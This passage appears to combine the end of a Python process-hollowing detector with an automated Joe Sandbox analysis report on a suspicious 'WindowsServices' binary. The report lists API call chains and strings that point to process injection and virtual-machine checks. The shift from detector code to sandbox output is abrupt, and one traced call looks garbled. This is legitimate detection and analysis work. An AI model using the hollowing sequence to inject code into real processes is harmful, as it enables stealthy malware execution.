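• ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
"""

# Constructed: a launcher that starts the child without CREATE_SUSPENDED and never touches its memory.
BENIGN_TRACE = """
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401000
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401010
"""

if __name__ == "__main__":
    for label, trace in (("sample", SAMPLE_TRACE), ("benign", BENIGN_TRACE)):
        r = detect_process_hollowing(parse_api_lines(trace))
        print(label, r["hollowing"], r["missing"], {k: hex(v) for k, v in r["evidence"].items()})
```

Ordering is what keeps the false-positive rate down: debuggers and some installers also create suspended children, but they do not follow up with WriteProcessMemory, SetThreadContext and ResumeThread on the same process in that sequence. The detector keys on the dwCreationFlags bit and the flProtect value rather than on API names alone, so a VirtualAllocEx with PAGE_READWRITE followed by VirtualProtectEx would need a further stage; that variant is not covered here.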
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcProcess32ReadSnapshotTerminateToolhelp32$CopyModuleModule32NameNextwcslenwcsstr
                                                                        • String ID: $ $ $ $ $ $ $ /c $"$"$"$"$"$"$"$"$",1$'$($)$.$.$.$.$.$.$.$.$.$.$.$.$.dll$/$/$/$0$0$0$2$2$2$2$2$2$2$2$2$2$4$5$5$7$7$<$<$<$<$<$=$>$>$>$>$>$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$Allocat$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$Clos$CopyFil$D$D$D$D$D$Dtl$Duplicat$E$E$E$E$E$E$E$E$E$EqualSid$ExitProc$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$I$I$I$I$IsWow64Proc$L$L$LookupAccountSidA$M$M$M$M$M$M$M$M$M$M$Modul$Modul$Mov$N$N$N$N$N$NtR$NtUnmapVi$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Proc$Proc$Program Fil$Q$Q$R$R$R$R$R$R$R$Rmr$RuV$RuV$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$Shdt$Sii$Sitbs$StcF$StcF$Susp$Sys$T$T$T$T$T$T$T$T$T$T$T$V$V$V$V$V$VBoxS$VirtualAlloc$VirtualAllocEx$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$Writ$Writ$\$\$\$\$\$\SD_$\cmd.$_$_$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$advapi$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$f$f$f$f$f$f$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$myapp.$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$psapi.dll$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z
                                                                        • API String ID: 1831195861-1627083277
                                                                        • Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
                                                                        • Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
                                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A2F1
                                                                          • Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD
                                                                        • _ftol.MSVCRT ref: 0040A30F
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A34B
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$Window$MessageSend$_ftol
                                                                        • String ID:
                                                                        • API String ID: 1452107452-0
                                                                        • Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
                                                                        • Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 409 40b2a2-40b2b7 69FD4ED0
                                                                        APIs
                                                                        • 69FD4ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
                                                                        • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • IsIconic.USER32(?), ref: 0040A464
                                                                        • SendMessageA.USER32(?,00000027,?,00000000), ref: 0040A49D
                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0040A4AB
                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0040A4B1
                                                                        • GetClientRect.USER32(?,?), ref: 0040A4BE
                                                                        • DrawIcon.USER32(?,?,?,?), ref: 0040A4F6
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 0040A5BE
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 0040A606
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 0040A622
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A66B
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsRectSystem$ClientDrawIconIconicMessageModeSendWindow
                                                                        • String ID:
                                                                        • API String ID: 1397294514-0
                                                                        • Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
                                                                        • Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A56
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A7E
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
                                                                          • Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ABE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ADE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404AFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol$Polygon
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 2518728319-821843137
                                                                        • Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
                                                                        • Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00405316
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040543E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040545E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040547E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040549E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040551E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040553E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040555E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040557E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040559E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040561E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040563E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040565E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040567E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040569E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040571E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040573E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040575E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$CreatePolygon$Combine_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 3890769595-821843137
                                                                        • Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
                                                                        • Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1221 404ec0-404ef6 CopyRect call 403c20 1224 404f06-404f28 CopyRect call 403c20 1221->1224 1225 404ef8-404f03 1221->1225 1228 404f38-404f5a CopyRect call 403c20 1224->1228 1229 404f2a-404f35 1224->1229 1232 404f6a-404f8c CopyRect call 403c20 1228->1232 1233 404f5c-404f67 1228->1233 1236 404f9c-404fbe CopyRect call 403c20 1232->1236 1237 404f8e-404f99 1232->1237 1240 404fc0-404fcb 1236->1240 1241 404fce-404ff0 CopyRect call 403c20 1236->1241 1244 405000-405022 CopyRect call 403c20 1241->1244 1245 404ff2-404ffd 1241->1245 1248 405032-405054 CopyRect call 403c20 1244->1248 1249 405024-40502f 1244->1249 1252 405064-405086 CopyRect call 403c20 1248->1252 1253 405056-405061 1248->1253 1256 405096-4050b8 CopyRect call 403c20 1252->1256 1257 405088-405093 1252->1257 1260 4050c8-4050ea CopyRect call 403c20 1256->1260 1261 4050ba-4050c5 1256->1261 1264 4050fa-40511c CopyRect call 403c20 1260->1264 1265 4050ec-4050f7 1260->1265 1268 40512c-40514e CopyRect call 403c20 1264->1268 1269 40511e-405129 1264->1269 1272 405150-40515b 1268->1272 1273 40515e-405180 CopyRect call 403c20 1268->1273 1276 405190-4051b2 CopyRect call 403c20 1273->1276 1277 405182-40518d 1273->1277 1280 4051c2-4051e4 CopyRect call 403c20 1276->1280 1281 4051b4-4051bf 1276->1281 1284 4051f4-405216 CopyRect call 403c20 1280->1284 1285 4051e6-4051f1 1280->1285 1288 405226-405248 CopyRect call 403c20 1284->1288 1289 405218-405223 1284->1289 1292 405258-40527a CopyRect call 403c20 1288->1292 1293 40524a-405255 1288->1293 1296 40528a-4052b7 CopyRect call 403c20 1292->1296 1297 40527c-405287 1292->1297
                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                          • Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404F10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 1144628616-677921438
                                                                        • Opcode ID: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction ID: 8a5b5832819b54604f0eb40b5f2cfffe4246f56c5ea39582f8810119041c68d6
                                                                        • Opcode Fuzzy Hash: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction Fuzzy Hash: EDA1C3BB6443103AE210B259AC42EAB676CDBE8724F408C3BF958D11C1F57DDA18C7B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1300 40b10f-40b184 __set_app_type __p__fmode __p__commode call 40b295 1303 40b192-40b1e9 call 40b280 _initterm __getmainargs _initterm 1300->1303 1304 40b186-40b191 __setusermatherr 1300->1304 1307 40b225-40b228 1303->1307 1308 40b1eb-40b1f3 1303->1308 1304->1303 1309 40b202-40b206 1307->1309 1310 40b22a-40b22e 1307->1310 1311 40b1f5-40b1f7 1308->1311 1312 40b1f9-40b1fc 1308->1312 1314 40b208-40b20a 1309->1314 1315 40b20c-40b21d GetStartupInfoA 1309->1315 1310->1307 1311->1308 1311->1312 1312->1309 1313 40b1fe-40b1ff 1312->1313 1313->1309 1314->1313 1314->1315 1316 40b230-40b232 1315->1316 1317 40b21f-40b223 1315->1317 1318 40b233-40b23e GetModuleHandleA call 40b2a2 1316->1318 1317->1318 1320 40b243-40b260 exit _XcptFilter 1318->1320
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                        • String ID:
                                                                        • API String ID: 801014965-0
                                                                        • Opcode ID: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction ID: 92e6429448b312161c6c86a2e6f2100586677b1d17cdbc89596afef87365b123
                                                                        • Opcode Fuzzy Hash: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction Fuzzy Hash: 68416FB5800344EFDB209FA5D889AAE7BB8EB09714F20067FE551A72E1D7784841CB9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
